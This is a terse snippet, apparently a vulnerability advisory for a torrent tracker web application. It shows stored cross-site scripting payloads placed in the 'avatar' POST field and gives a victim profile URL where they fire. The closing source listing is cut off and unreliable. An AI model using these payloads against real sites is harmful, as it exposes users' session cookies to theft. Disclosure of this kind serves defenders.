version 11-10-05-BETA-SF1:111005 <=
$avatar = $_POST["avatar"];
where
$_POST["avatar"]=javascript:alert(document.cookie);
or
$_POST["avatar"]="><";
-> last version <= 010306
$_POST["avatar"]=javascript:alert(document.cookie);
go to
http://torrentvictim/userdetails.php?id=malicioususerprofileid
the souce code is:
...| Avatar |  |